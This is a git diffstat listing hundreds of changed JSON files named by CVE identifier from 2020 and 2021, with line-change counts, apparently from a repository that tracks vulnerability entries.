2020/CVE-2020-23586.json | 3 +- 2020/CVE-2020-23587.json | 3 +- 2020/CVE-2020-23588.json | 3 +- 2020/CVE-2020-23589.json | 3 +- 2020/CVE-2020-23590.json | 3 +- 2020/CVE-2020-23591.json | 3 +- 2020/CVE-2020-23592.json | 3 +- 2020/CVE-2020-23593.json | 3 +- 2020/CVE-2020-23839.json | 3 +- 2020/CVE-2020-23934.json | 3 +- 2020/CVE-2020-23968.json | 3 +- 2020/CVE-2020-24028.json | 6 +- 2020/CVE-2020-24029.json | 6 +- 2020/CVE-2020-24030.json | 6 +- 2020/CVE-2020-24032.json | 3 +- 2020/CVE-2020-24033.json | 3 +- 2020/CVE-2020-24088.json | 3 +- 2020/CVE-2020-24089.json | 3 +- 2020/CVE-2020-24148.json | 3 +- 2020/CVE-2020-24186.json | 12 +- 2020/CVE-2020-24227.json | 3 +- 2020/CVE-2020-24490.json | 6 +- 2020/CVE-2020-24572.json | 6 +- 2020/CVE-2020-24597.json | 3 +- 2020/CVE-2020-24616.json | 3 +- 2020/CVE-2020-24656.json | 3 +- 2020/CVE-2020-24750.json | 3 +- 2020/CVE-2020-24765.json | 3 +- 2020/CVE-2020-24815.json | 3 +- 2020/CVE-2020-24913.json | 3 +- 2020/CVE-2020-24949.json | 3 +- 2020/CVE-2020-24955.json | 3 +- 2020/CVE-2020-24972.json | 3 +- 2020/CVE-2020-2501.json | 3 +- 2020/CVE-2020-25068.json | 3 +- 2020/CVE-2020-25078.json | 6 +- 2020/CVE-2020-2509.json | 3 +- 2020/CVE-2020-25134.json | 3 +- 2020/CVE-2020-25200.json | 3 +- 2020/CVE-2020-25213.json | 27 +- 2020/CVE-2020-25223.json | 6 +- 2020/CVE-2020-25265.json | 3 +- 2020/CVE-2020-25270.json | 3 +- 2020/CVE-2020-25271.json | 3 +- 2020/CVE-2020-25272.json | 3 +- 2020/CVE-2020-25273.json | 3 +- 2020/CVE-2020-25398.json | 3 +- 2020/CVE-2020-25399.json | 3 +- 2020/CVE-2020-2546.json | 3 +- 2020/CVE-2020-25478.json | 3 +- 2020/CVE-2020-25487.json | 3 +- 2020/CVE-2020-25488.json | 3 +- 2020/CVE-2020-25498.json | 3 +- 2020/CVE-2020-2551.json | 27 +- 2020/CVE-2020-25514.json | 3 +- 2020/CVE-2020-25515.json | 3 +- 2020/CVE-2020-25518.json | 3 +- 2020/CVE-2020-25540.json | 12 +- 2020/CVE-2020-2555.json | 18 +- 2020/CVE-2020-25578.json | 3 +- 2020/CVE-2020-25613.json | 3 +- 2020/CVE-2020-25627.json | 3 +- 2020/CVE-2020-25632.json | 3 +- 2020/CVE-2020-25637.json | 3 +- 2020/CVE-2020-256480.json | 3 +- 2020/CVE-2020-25668.json | 3 +- 2020/CVE-2020-25686.json | 3 +- 2020/CVE-2020-25705.json | 6 +- 2020/CVE-2020-25747.json | 3 +- 2020/CVE-2020-25748.json | 3 +- 2020/CVE-2020-25749.json | 3 +- 2020/CVE-2020-25769.json | 3 +- 2020/CVE-2020-25782.json | 3 +- 2020/CVE-2020-25790.json | 3 +- 2020/CVE-2020-25860.json | 3 +- 2020/CVE-2020-25867.json | 3 +- 2020/CVE-2020-26061.json | 3 +- 2020/CVE-2020-26217.json | 9 +- 2020/CVE-2020-26233.json | 6 +- 2020/CVE-2020-26258.json | 3 +- 2020/CVE-2020-26259.json | 6 +- 2020/CVE-2020-26413.json | 3 +- 2020/CVE-2020-26525.json | 3 +- 2020/CVE-2020-26526.json | 3 +- 2020/CVE-2020-26527.json | 3 +- 2020/CVE-2020-2655.json | 3 +- 2020/CVE-2020-26732.json | 3 +- 2020/CVE-2020-26733.json | 3 +- 2020/CVE-2020-26878.json | 3 +- 2020/CVE-2020-27190.json | 3 +- 2020/CVE-2020-27194.json | 6 +- 2020/CVE-2020-27199.json | 3 +- 2020/CVE-2020-27223.json | 12 +- 2020/CVE-2020-27252.json | 3 +- 2020/CVE-2020-27301.json | 3 +- 2020/CVE-2020-2733.json | 3 +- 2020/CVE-2020-27358.json | 3 +- 2020/CVE-2020-27368.json | 3 +- 2020/CVE-2020-27603.json | 3 +- 2020/CVE-2020-27688.json | 3 +- 2020/CVE-2020-27747.json | 3 +- 2020/CVE-2020-27786.json | 12 +- 2020/CVE-2020-27815.json | 3 +- 2020/CVE-2020-27824.json | 3 +- 2020/CVE-2020-27838.json | 3 +- 2020/CVE-2020-27904.json | 3 +- 2020/CVE-2020-27930.json | 3 +- 2020/CVE-2020-27935.json | 3 +- 2020/CVE-2020-27949.json | 3 +- 2020/CVE-2020-27950.json | 6 +- 2020/CVE-2020-27955.json | 54 +- 2020/CVE-2020-27976.json | 3 +- 2020/CVE-2020-28018.json | 6 +- 2020/CVE-2020-28032.json | 3 +- 2020/CVE-2020-28052.json | 6 +- 2020/CVE-2020-28054.json | 3 +- 2020/CVE-2020-28148.json | 3 +- 2020/CVE-2020-28169.json | 3 +- 2020/CVE-2020-28243.json | 3 +- 2020/CVE-2020-28328.json | 3 +- 2020/CVE-2020-28351.json | 3 +- 2020/CVE-2020-28414.json | 3 +- 2020/CVE-2020-28415.json | 3 +- 2020/CVE-2020-28478.json | 3 +- 2020/CVE-2020-28488.json | 3 +- 2020/CVE-2020-28502.json | 6 +- 2020/CVE-2020-28647.json | 3 +- 2020/CVE-2020-28653.json | 9 +- 2020/CVE-2020-2883.json | 21 +- 2020/CVE-2020-28874.json | 3 +- 2020/CVE-2020-28926.json | 3 +- 2020/CVE-2020-28948.json | 9 +- 2020/CVE-2020-29007.json | 3 +- 2020/CVE-2020-29070.json | 3 +- 2020/CVE-2020-29134.json | 3 +- 2020/CVE-2020-29156.json | 3 +- 2020/CVE-2020-29254.json | 3 +- 2020/CVE-2020-29364.json | 3 +- 2020/CVE-2020-29370.json | 3 +- 2020/CVE-2020-2950.json | 3 +- 2020/CVE-2020-29583.json | 3 +- 2020/CVE-2020-29599.json | 3 +- 2020/CVE-2020-29607.json | 6 +- 2020/CVE-2020-29661.json | 6 +- 2020/CVE-2020-29666.json | 3 +- 2020/CVE-2020-29667.json | 3 +- 2020/CVE-2020-29669.json | 3 +- 2020/CVE-2020-2969.json | 3 +- 2020/CVE-2020-2978.json | 3 +- 2020/CVE-2020-3153.json | 9 +- 2020/CVE-2020-3161.json | 3 +- 2020/CVE-2020-3187.json | 15 +- 2020/CVE-2020-3433.json | 3 +- 2020/CVE-2020-3452.json | 63 +- 2020/CVE-2020-35191.json | 3 +- 2020/CVE-2020-35262.json | 3 +- 2020/CVE-2020-35314.json | 6 +- 2020/CVE-2020-35391.json | 6 +- 2020/CVE-2020-35476.json | 3 +- 2020/CVE-2020-35488.json | 6 +- 2020/CVE-2020-35489.json | 15 +- 2020/CVE-2020-35498.json | 3 +- 2020/CVE-2020-35545.json | 3 +- 2020/CVE-2020-35590.json | 3 +- 2020/CVE-2020-35606.json | 3 +- 2020/CVE-2020-35669.json | 3 +- 2020/CVE-2020-35682.json | 3 +- 2020/CVE-2020-35713.json | 3 +- 2020/CVE-2020-35717.json | 6 +- 2020/CVE-2020-35728.json | 3 +- 2020/CVE-2020-35729.json | 3 +- 2020/CVE-2020-35749.json | 3 +- 2020/CVE-2020-3580.json | 12 +- 2020/CVE-2020-35846.json | 6 +- 2020/CVE-2020-35847.json | 3 +- 2020/CVE-2020-36079.json | 3 +- 2020/CVE-2020-36109.json | 6 +- 2020/CVE-2020-36179.json | 3 +- 2020/CVE-2020-36184.json | 3 +- 2020/CVE-2020-36188.json | 3 +- 2020/CVE-2020-36287.json | 3 +- 2020/CVE-2020-36518.json | 3 +- 2020/CVE-2020-36603.json | 3 +- 2020/CVE-2020-36730.json | 3 +- 2020/CVE-2020-36732.json | 6 +- 2020/CVE-2020-3766.json | 3 +- 2020/CVE-2020-3952.json | 15 +- 2020/CVE-2020-3956.json | 3 +- 2020/CVE-2020-3992.json | 9 +- 2020/CVE-2020-4040.json | 3 +- 2020/CVE-2020-4276.json | 3 +- 2020/CVE-2020-4463.json | 3 +- 2020/CVE-2020-4464.json | 6 +- 2020/CVE-2020-5014.json | 3 +- 2020/CVE-2020-5236.json | 3 +- 2020/CVE-2020-5245.json | 3 +- 2020/CVE-2020-5248.json | 6 +- 2020/CVE-2020-5250.json | 3 +- 2020/CVE-2020-5254.json | 3 +- 2020/CVE-2020-5260.json | 9 +- 2020/CVE-2020-5267.json | 3 +- 2020/CVE-2020-5377.json | 6 +- 2020/CVE-2020-5398.json | 3 +- 2020/CVE-2020-5410.json | 6 +- 2020/CVE-2020-5421.json | 3 +- 2020/CVE-2020-5504.json | 3 +- 2020/CVE-2020-5752.json | 3 +- 2020/CVE-2020-5837.json | 3 +- 2020/CVE-2020-5839.json | 3 +- 2020/CVE-2020-5842.json | 3 +- 2020/CVE-2020-5844.json | 6 +- 2020/CVE-2020-5902.json | 168 +++-- 2020/CVE-2020-5903.json | 3 +- 2020/CVE-2020-6207.json | 3 +- 2020/CVE-2020-6286.json | 3 +- 2020/CVE-2020-6287.json | 21 +- 2020/CVE-2020-6308.json | 12 +- 2020/CVE-2020-6364.json | 3 +- 2020/CVE-2020-6418.json | 12 +- 2020/CVE-2020-6468.json | 6 +- 2020/CVE-2020-6514.json | 3 +- 2020/CVE-2020-6516.json | 3 +- 2020/CVE-2020-6519.json | 3 +- 2020/CVE-2020-6650.json | 3 +- 2020/CVE-2020-6861.json | 3 +- 2020/CVE-2020-6888.json | 3 +- 2020/CVE-2020-7048.json | 3 +- 2020/CVE-2020-7115.json | 3 +- 2020/CVE-2020-7200.json | 3 +- 2020/CVE-2020-72381.json | 3 +- 2020/CVE-2020-7246.json | 9 +- 2020/CVE-2020-7247.json | 24 +- 2020/CVE-2020-7283.json | 3 +- 2020/CVE-2020-7352.json | 3 +- 2020/CVE-2020-7378.json | 3 +- 2020/CVE-2020-7384.json | 6 +- 2020/CVE-2020-7388.json | 3 +- 2020/CVE-2020-7461.json | 6 +- 2020/CVE-2020-7471.json | 21 +- 2020/CVE-2020-7473.json | 3 +- 2020/CVE-2020-7661.json | 3 +- 2020/CVE-2020-7693.json | 3 +- 2020/CVE-2020-7699.json | 3 +- 2020/CVE-2020-7740.json | 3 +- 2020/CVE-2020-7799.json | 6 +- 2020/CVE-2020-7897.json | 3 +- 2020/CVE-2020-7931.json | 3 +- 2020/CVE-2020-7934.json | 6 +- 2020/CVE-2020-7961.json | 33 +- 2020/CVE-2020-7980.json | 3 +- 2020/CVE-2020-8004.json | 3 +- 2020/CVE-2020-8012.json | 3 +- 2020/CVE-2020-8103.json | 3 +- 2020/CVE-2020-8163.json | 9 +- 2020/CVE-2020-8165.json | 21 +- 2020/CVE-2020-8175.json | 6 +- 2020/CVE-2020-8193.json | 15 +- 2020/CVE-2020-8209.json | 3 +- 2020/CVE-2020-8218.json | 3 +- 2020/CVE-2020-8241.json | 3 +- 2020/CVE-2020-8248.json | 3 +- 2020/CVE-2020-8249.json | 3 +- 2020/CVE-2020-8250.json | 3 +- 2020/CVE-2020-8254.json | 3 +- 2020/CVE-2020-8277.json | 6 +- 2020/CVE-2020-8287.json | 3 +- 2020/CVE-2020-8289.json | 3 +- 2020/CVE-2020-8290.json | 3 +- 2020/CVE-2020-8300.json | 3 +- 2020/CVE-2020-8417.json | 12 +- 2020/CVE-2020-8423.json | 3 +- 2020/CVE-2020-8437.json | 3 +- 2020/CVE-2020-8515.json | 9 +- 2020/CVE-2020-8554.json | 15 +- 2020/CVE-2020-8558.json | 6 +- 2020/CVE-2020-8559.json | 6 +- 2020/CVE-2020-8597.json | 12 +- 2020/CVE-2020-8617.json | 6 +- 2020/CVE-2020-8635.json | 3 +- 2020/CVE-2020-8637.json | 3 +- 2020/CVE-2020-8644.json | 3 +- 2020/CVE-2020-8809.json | 3 +- 2020/CVE-2020-8813.json | 12 +- 2020/CVE-2020-8816.json | 12 +- 2020/CVE-2020-8825.json | 3 +- 2020/CVE-2020-8835.json | 15 +- 2020/CVE-2020-8840.json | 18 +- 2020/CVE-2020-8888.json | 3 +- 2020/CVE-2020-8950.json | 3 +- 2020/CVE-2020-8958.json | 6 +- 2020/CVE-2020-9006.json | 3 +- 2020/CVE-2020-9008.json | 3 +- 2020/CVE-2020-9038.json | 3 +- 2020/CVE-2020-9047.json | 3 +- 2020/CVE-2020-9054.json | 3 +- 2020/CVE-2020-9273.json | 3 +- 2020/CVE-2020-9283.json | 3 +- 2020/CVE-2020-9289.json | 3 +- 2020/CVE-2020-9332.json | 3 +- 2020/CVE-2020-9375.json | 3 +- 2020/CVE-2020-9376.json | 3 +- 2020/CVE-2020-9380.json | 3 +- 2020/CVE-2020-9442.json | 3 +- 2020/CVE-2020-9460.json | 3 +- 2020/CVE-2020-9461.json | 3 +- 2020/CVE-2020-9470.json | 3 +- 2020/CVE-2020-9472.json | 3 +- 2020/CVE-2020-9480.json | 3 +- 2020/CVE-2020-9483.json | 6 +- 2020/CVE-2020-9484.json | 54 +- 2020/CVE-2020-9495.json | 3 +- 2020/CVE-2020-9496.json | 24 +- 2020/CVE-2020-9547.json | 3 +- 2020/CVE-2020-9548.json | 3 +- 2020/CVE-2020-9715.json | 6 +- 2020/CVE-2020-9758.json | 3 +- 2020/CVE-2020-9767.json | 3 +- 2020/CVE-2020-9802.json | 3 +- 2020/CVE-2020-9922.json | 3 +- 2020/CVE-2020-9934.json | 3 +- 2020/CVE-2020-9992.json | 3 +- 2021/CVE-2021-0302.json | 3 +- 2021/CVE-2021-0306.json | 3 +- 2021/CVE-2021-0308.json | 3 +- 2021/CVE-2021-0313.json | 3 +- 2021/CVE-2021-0314.json | 3 +- 2021/CVE-2021-0315.json | 9 +- 2021/CVE-2021-0316.json | 3 +- 2021/CVE-2021-0318.json | 3 +- 2021/CVE-2021-0319.json | 3 +- 2021/CVE-2021-0325.json | 3 +- 2021/CVE-2021-0326.json | 15 +- 2021/CVE-2021-0327.json | 3 +- 2021/CVE-2021-0328.json | 3 +- 2021/CVE-2021-0329.json | 3 +- 2021/CVE-2021-0330.json | 3 +- 2021/CVE-2021-0331.json | 3 +- 2021/CVE-2021-0332.json | 3 +- 2021/CVE-2021-0333.json | 3 +- 2021/CVE-2021-0334.json | 3 +- 2021/CVE-2021-0336.json | 3 +- 2021/CVE-2021-0337.json | 3 +- 2021/CVE-2021-0339.json | 3 +- 2021/CVE-2021-0340.json | 6 +- 2021/CVE-2021-0390.json | 3 +- 2021/CVE-2021-0391.json | 3 +- 2021/CVE-2021-0392.json | 3 +- 2021/CVE-2021-0393.json | 3 +- 2021/CVE-2021-0394.json | 6 +- 2021/CVE-2021-0396.json | 3 +- 2021/CVE-2021-0397.json | 3 +- 2021/CVE-2021-0399.json | 3 +- 2021/CVE-2021-0431.json | 6 +- 2021/CVE-2021-0433.json | 3 +- 2021/CVE-2021-0435.json | 6 +- 2021/CVE-2021-0437.json | 3 +- 2021/CVE-2021-0466.json | 3 +- 2021/CVE-2021-0472.json | 3 +- 2021/CVE-2021-0474.json | 6 +- 2021/CVE-2021-0475.json | 3 +- 2021/CVE-2021-0476.json | 3 +- 2021/CVE-2021-0478.json | 3 +- 2021/CVE-2021-0481.json | 3 +- 2021/CVE-2021-0506.json | 3 +- 2021/CVE-2021-0507.json | 3 +- 2021/CVE-2021-0508.json | 3 +- 2021/CVE-2021-0509.json | 3 +- 2021/CVE-2021-0510.json | 3 +- 2021/CVE-2021-0511.json | 3 +- 2021/CVE-2021-0513.json | 3 +- 2021/CVE-2021-0516.json | 3 +- 2021/CVE-2021-0519.json | 3 +- 2021/CVE-2021-0520.json | 6 +- 2021/CVE-2021-0522.json | 3 +- 2021/CVE-2021-0586.json | 3 +- 2021/CVE-2021-0589.json | 6 +- 2021/CVE-2021-0594.json | 3 +- 2021/CVE-2021-0595.json | 6 +- 2021/CVE-2021-0600.json | 3 +- 2021/CVE-2021-0640.json | 3 +- 2021/CVE-2021-0652.json | 3 +- 2021/CVE-2021-0683.json | 3 +- 2021/CVE-2021-0688.json | 3 +- 2021/CVE-2021-0705.json | 6 +- 2021/CVE-2021-0928.json | 3 +- 2021/CVE-2021-0954.json | 3 +- 2021/CVE-2021-0963.json | 3 +- 2021/CVE-2021-10086.json | 3 +- 2021/CVE-2021-1056.json | 3 +- 2021/CVE-2021-1366.json | 3 +- 2021/CVE-2021-1480.json | 3 +- 2021/CVE-2021-1497.json | 3 +- 2021/CVE-2021-1585.json | 3 +- 2021/CVE-2021-1636.json | 3 +- 2021/CVE-2021-1647.json | 3 +- 2021/CVE-2021-1656.json | 3 +- 2021/CVE-2021-1675.json | 132 ++-- 2021/CVE-2021-1678.json | 3 +- 2021/CVE-2021-1699.json | 3 +- 2021/CVE-2021-1732.json | 39 +- 2021/CVE-2021-1748.json | 6 +- 2021/CVE-2021-1782.json | 6 +- 2021/CVE-2021-1883.json | 3 +- 2021/CVE-2021-1905.json | 3 +- 2021/CVE-2021-1961.json | 3 +- 2021/CVE-2021-1965.json | 6 +- 2021/CVE-2021-1994.json | 3 +- 2021/CVE-2021-20021.json | 3 +- 2021/CVE-2021-20038.json | 6 +- 2021/CVE-2021-20138.json | 3 +- 2021/CVE-2021-2021.json | 3 +- 2021/CVE-2021-20233.json | 3 +- 2021/CVE-2021-20253.json | 3 +- 2021/CVE-2021-20294.json | 3 +- 2021/CVE-2021-20323.json | 9 +- 2021/CVE-2021-20717.json | 3 +- 2021/CVE-2021-20837.json | 12 +- 2021/CVE-2021-21014.json | 3 +- 2021/CVE-2021-21017.json | 6 +- 2021/CVE-2021-21042.json | 6 +- 2021/CVE-2021-21086.json | 3 +- 2021/CVE-2021-2109.json | 18 +- 2021/CVE-2021-21110.json | 3 +- 2021/CVE-2021-21123.json | 3 +- 2021/CVE-2021-21148.json | 3 +- 2021/CVE-2021-2119.json | 9 +- 2021/CVE-2021-21193.json | 3 +- 2021/CVE-2021-21220.json | 3 +- 2021/CVE-2021-21234.json | 6 +- 2021/CVE-2021-21239.json | 3 +- 2021/CVE-2021-21300.json | 42 +- 2021/CVE-2021-21311.json | 6 +- 2021/CVE-2021-21315.json | 18 +- 2021/CVE-2021-21341.json | 6 +- 2021/CVE-2021-21349.json | 3 +- 2021/CVE-2021-21380.json | 3 +- 2021/CVE-2021-21389.json | 3 +- 2021/CVE-2021-21402.json | 9 +- 2021/CVE-2021-21425.json | 6 +- 2021/CVE-2021-21514.json | 3 +- 2021/CVE-2021-21551.json | 27 +- 2021/CVE-2021-21716.json | 3 +- 2021/CVE-2021-2173.json | 3 +- 2021/CVE-2021-2175.json | 3 +- 2021/CVE-2021-21809.json | 3 +- 2021/CVE-2021-21972.json | 84 ++- 2021/CVE-2021-21973.json | 3 +- 2021/CVE-2021-21974.json | 12 +- 2021/CVE-2021-21975.json | 24 +- 2021/CVE-2021-21978.json | 9 +- 2021/CVE-2021-21980.json | 6 +- 2021/CVE-2021-21983.json | 3 +- 2021/CVE-2021-21985.json | 30 +- 2021/CVE-2021-22.json | 3 +- 2021/CVE-2021-22005.json | 33 +- 2021/CVE-2021-22006.json | 3 +- 2021/CVE-2021-22015.json | 3 +- 2021/CVE-2021-22053.json | 6 +- 2021/CVE-2021-22054.json | 3 +- 2021/CVE-2021-22119.json | 3 +- 2021/CVE-2021-22123.json | 3 +- 2021/CVE-2021-22145.json | 3 +- 2021/CVE-2021-22146.json | 3 +- 2021/CVE-2021-22192.json | 6 +- 2021/CVE-2021-22201.json | 3 +- 2021/CVE-2021-22204.json | 42 +- 2021/CVE-2021-22205.json | 84 ++- 2021/CVE-2021-22206.json | 3 +- 2021/CVE-2021-22214.json | 9 +- 2021/CVE-2021-22555.json | 30 +- 2021/CVE-2021-22569.json | 3 +- 2021/CVE-2021-22873.json | 3 +- 2021/CVE-2021-22880.json | 3 +- 2021/CVE-2021-22893.json | 9 +- 2021/CVE-2021-22911.json | 18 +- 2021/CVE-2021-22924.json | 3 +- 2021/CVE-2021-22941.json | 3 +- 2021/CVE-2021-22986.json | 45 +- 2021/CVE-2021-23017.json | 12 +- 2021/CVE-2021-2302.json | 3 +- 2021/CVE-2021-23132.json | 3 +- 2021/CVE-2021-23358.json | 6 +- 2021/CVE-2021-23383.json | 3 +- 2021/CVE-2021-23410.json | 3 +- 2021/CVE-2021-23639.json | 3 +- 2021/CVE-2021-23758.json | 3 +- 2021/CVE-2021-23840.json | 3 +- 2021/CVE-2021-23841.json | 6 +- 2021/CVE-2021-2394.json | 12 +- 2021/CVE-2021-24027.json | 3 +- 2021/CVE-2021-24084.json | 6 +- 2021/CVE-2021-24085.json | 3 +- 2021/CVE-2021-24086.json | 6 +- 2021/CVE-2021-24096.json | 3 +- 2021/CVE-2021-24098.json | 3 +- 2021/CVE-2021-24145.json | 3 +- 2021/CVE-2021-24155.json | 3 +- 2021/CVE-2021-24160.json | 6 +- 2021/CVE-2021-24356.json | 3 +- 2021/CVE-2021-24499.json | 9 +- 2021/CVE-2021-24507.json | 3 +- 2021/CVE-2021-24545.json | 6 +- 2021/CVE-2021-2456.json | 3 +- 2021/CVE-2021-24563.json | 3 +- 2021/CVE-2021-24647.json | 3 +- 2021/CVE-2021-2471.json | 9 +- 2021/CVE-2021-24741.json | 3 +- 2021/CVE-2021-24750.json | 3 +- 2021/CVE-2021-24807.json | 3 +- 2021/CVE-2021-24884.json | 3 +- 2021/CVE-2021-24917.json | 6 +- 2021/CVE-2021-24959.json | 3 +- 2021/CVE-2021-25003.json | 3 +- 2021/CVE-2021-25032.json | 3 +- 2021/CVE-2021-25076.json | 3 +- 2021/CVE-2021-25094.json | 12 +- 2021/CVE-2021-25162.json | 3 +- 2021/CVE-2021-25253.json | 3 +- 2021/CVE-2021-25281.json | 3 +- 2021/CVE-2021-25374.json | 3 +- 2021/CVE-2021-25461.json | 3 +- 2021/CVE-2021-25641.json | 6 +- 2021/CVE-2021-25642.json | 3 +- 2021/CVE-2021-25646.json | 24 +- 2021/CVE-2021-25679.json | 3 +- 2021/CVE-2021-25735.json | 3 +- 2021/CVE-2021-25741.json | 6 +- 2021/CVE-2021-25790.json | 3 +- 2021/CVE-2021-25791.json | 3 +- 2021/CVE-2021-25801.json | 3 +- 2021/CVE-2021-25804.json | 3 +- 2021/CVE-2021-25837.json | 3 +- 2021/CVE-2021-26084.json | 117 ++-- 2021/CVE-2021-26085.json | 3 +- 2021/CVE-2021-26086.json | 6 +- 2021/CVE-2021-26088.json | 3 +- 2021/CVE-2021-26102.json | 3 +- 2021/CVE-2021-26121.json | 3 +- 2021/CVE-2021-26258.json | 3 +- 2021/CVE-2021-26295.json | 15 +- 2021/CVE-2021-26411.json | 3 +- 2021/CVE-2021-26414.json | 3 +- 2021/CVE-2021-26415.json | 3 +- 2021/CVE-2021-26690.json | 3 +- 2021/CVE-2021-26691.json | 3 +- 2021/CVE-2021-26700.json | 6 +- 2021/CVE-2021-26708.json | 6 +- 2021/CVE-2021-26714.json | 3 +- 2021/CVE-2021-26814.json | 9 +- 2021/CVE-2021-26828.json | 3 +- 2021/CVE-2021-26832.json | 3 +- 2021/CVE-2021-26855.json | 138 +++-- 2021/CVE-2021-26856.json | 3 +- 2021/CVE-2021-26857.json | 3 +- 2021/CVE-2021-26868.json | 3 +- 2021/CVE-2021-26871.json | 3 +- 2021/CVE-2021-26882.json | 3 +- 2021/CVE-2021-268855.json | 3 +- 2021/CVE-2021-26903.json | 3 +- 2021/CVE-2021-26904.json | 3 +- 2021/CVE-2021-26943.json | 3 +- 2021/CVE-2021-27065.json | 3 +- 2021/CVE-2021-27180.json | 3 +- 2021/CVE-2021-27187.json | 3 +- 2021/CVE-2021-27188.json | 3 +- 2021/CVE-2021-27190.json | 3 +- 2021/CVE-2021-27198.json | 3 +- 2021/CVE-2021-27211.json | 3 +- 2021/CVE-2021-27246.json | 3 +- 2021/CVE-2021-27328.json | 3 +- 2021/CVE-2021-27338.json | 3 +- 2021/CVE-2021-27342.json | 3 +- 2021/CVE-2021-27403.json | 3 +- 2021/CVE-2021-27404.json | 3 +- 2021/CVE-2021-27513.json | 6 +- 2021/CVE-2021-27651.json | 9 +- 2021/CVE-2021-27850.json | 12 +- 2021/CVE-2021-27890.json | 3 +- 2021/CVE-2021-27905.json | 12 +- 2021/CVE-2021-27928.json | 9 +- 2021/CVE-2021-27963.json | 3 +- 2021/CVE-2021-27965.json | 9 +- 2021/CVE-2021-28079.json | 3 +- 2021/CVE-2021-28164.json | 3 +- 2021/CVE-2021-28165.json | 6 +- 2021/CVE-2021-28310.json | 3 +- 2021/CVE-2021-28312.json | 3 +- 2021/CVE-2021-28378.json | 3 +- 2021/CVE-2021-28476.json | 18 +- 2021/CVE-2021-28480.json | 6 +- 2021/CVE-2021-28482.json | 6 +- 2021/CVE-2021-28663.json | 3 +- 2021/CVE-2021-29002.json | 3 +- 2021/CVE-2021-29003.json | 3 +- 2021/CVE-2021-29155.json | 3 +- 2021/CVE-2021-29156.json | 6 +- 2021/CVE-2021-29200.json | 3 +- 2021/CVE-2021-29267.json | 3 +- 2021/CVE-2021-29337.json | 3 +- 2021/CVE-2021-29349.json | 6 +- 2021/CVE-2021-29440.json | 3 +- 2021/CVE-2021-29441.json | 6 +- 2021/CVE-2021-29442.json | 3 +- 2021/CVE-2021-29447.json | 45 +- 2021/CVE-2021-29505.json | 3 +- 2021/CVE-2021-29627.json | 3 +- 2021/CVE-2021-30005.json | 3 +- 2021/CVE-2021-3007.json | 3 +- 2021/CVE-2021-30109.json | 3 +- 2021/CVE-2021-30128.json | 3 +- 2021/CVE-2021-30146.json | 3 +- 2021/CVE-2021-3019.json | 24 +- 2021/CVE-2021-30357.json | 3 +- 2021/CVE-2021-30461.json | 12 +- 2021/CVE-2021-30481.json | 6 +- 2021/CVE-2021-30551.json | 3 +- 2021/CVE-2021-30573.json | 9 +- 2021/CVE-2021-3060.json | 6 +- 2021/CVE-2021-30632.json | 12 +- 2021/CVE-2021-3064.json | 3 +- 2021/CVE-2021-30641.json | 3 +- 2021/CVE-2021-30657.json | 3 +- 2021/CVE-2021-30682.json | 3 +- 2021/CVE-2021-30731.json | 3 +- 2021/CVE-2021-30807.json | 6 +- 2021/CVE-2021-30858.json | 6 +- 2021/CVE-2021-30860.json | 6 +- 2021/CVE-2021-30937.json | 3 +- 2021/CVE-2021-30955.json | 21 +- 2021/CVE-2021-30956.json | 3 +- 2021/CVE-2021-31159.json | 3 +- 2021/CVE-2021-31166.json | 33 +- 2021/CVE-2021-31184.json | 3 +- 2021/CVE-2021-3122.json | 3 +- 2021/CVE-2021-31233.json | 3 +- 2021/CVE-2021-3129.json | 84 ++- 2021/CVE-2021-31290.json | 3 +- 2021/CVE-2021-3130.json | 3 +- 2021/CVE-2021-3131.json | 3 +- 2021/CVE-2021-3138.json | 3 +- 2021/CVE-2021-3156.json | 222 ++++--- 2021/CVE-2021-3157.json | 3 +- 2021/CVE-2021-31589.json | 3 +- 2021/CVE-2021-31630.json | 30 +- 2021/CVE-2021-3164.json | 3 +- 2021/CVE-2021-3166.json | 3 +- 2021/CVE-2021-31728.json | 3 +- 2021/CVE-2021-31760.json | 6 +- 2021/CVE-2021-31761.json | 6 +- 2021/CVE-2021-31762.json | 6 +- 2021/CVE-2021-31796.json | 3 +- 2021/CVE-2021-31800.json | 6 +- 2021/CVE-2021-31805.json | 24 +- 2021/CVE-2021-31856.json | 3 +- 2021/CVE-2021-31862.json | 3 +- 2021/CVE-2021-31955.json | 3 +- 2021/CVE-2021-31956.json | 12 +- 2021/CVE-2021-32099.json | 12 +- 2021/CVE-2021-32156.json | 3 +- 2021/CVE-2021-32157.json | 6 +- 2021/CVE-2021-32158.json | 3 +- 2021/CVE-2021-32159.json | 3 +- 2021/CVE-2021-32160.json | 3 +- 2021/CVE-2021-32161.json | 3 +- 2021/CVE-2021-32162.json | 3 +- 2021/CVE-2021-3229.json | 3 +- 2021/CVE-2021-32305.json | 6 +- 2021/CVE-2021-32399.json | 3 +- 2021/CVE-2021-32471.json | 3 +- 2021/CVE-2021-32537.json | 3 +- 2021/CVE-2021-32644.json | 3 +- 2021/CVE-2021-32648.json | 6 +- 2021/CVE-2021-32682.json | 3 +- 2021/CVE-2021-32724.json | 3 +- 2021/CVE-2021-32789.json | 6 +- 2021/CVE-2021-3279.json | 3 +- 2021/CVE-2021-32804.json | 3 +- 2021/CVE-2021-3281.json | 3 +- 2021/CVE-2021-32819.json | 3 +- 2021/CVE-2021-32849.json | 6 +- 2021/CVE-2021-3291.json | 3 +- 2021/CVE-2021-33026.json | 6 +- 2021/CVE-2021-33034.json | 3 +- 2021/CVE-2021-33044.json | 12 +- 2021/CVE-2021-33045.json | 3 +- 2021/CVE-2021-3310.json | 3 +- 2021/CVE-2021-33104.json | 3 +- 2021/CVE-2021-3317.json | 3 +- 2021/CVE-2021-3345.json | 6 +- 2021/CVE-2021-3347.json | 3 +- 2021/CVE-2021-33558.json | 6 +- 2021/CVE-2021-33560.json | 3 +- 2021/CVE-2021-33564.json | 6 +- 2021/CVE-2021-3360.json | 3 +- 2021/CVE-2021-33624.json | 3 +- 2021/CVE-2021-33690.json | 3 +- 2021/CVE-2021-33699.json | 3 +- 2021/CVE-2021-33739.json | 6 +- 2021/CVE-2021-33766.json | 6 +- 2021/CVE-2021-3378.json | 3 +- 2021/CVE-2021-33831.json | 3 +- 2021/CVE-2021-33879.json | 3 +- 2021/CVE-2021-33909.json | 12 +- 2021/CVE-2021-3395.json | 3 +- 2021/CVE-2021-33959.json | 3 +- 2021/CVE-2021-34045.json | 6 +- 2021/CVE-2021-34371.json | 3 +- 2021/CVE-2021-3438.json | 6 +- 2021/CVE-2021-3441.json | 3 +- 2021/CVE-2021-34428.json | 3 +- 2021/CVE-2021-34429.json | 3 +- 2021/CVE-2021-34470.json | 3 +- 2021/CVE-2021-34473.json | 27 +- 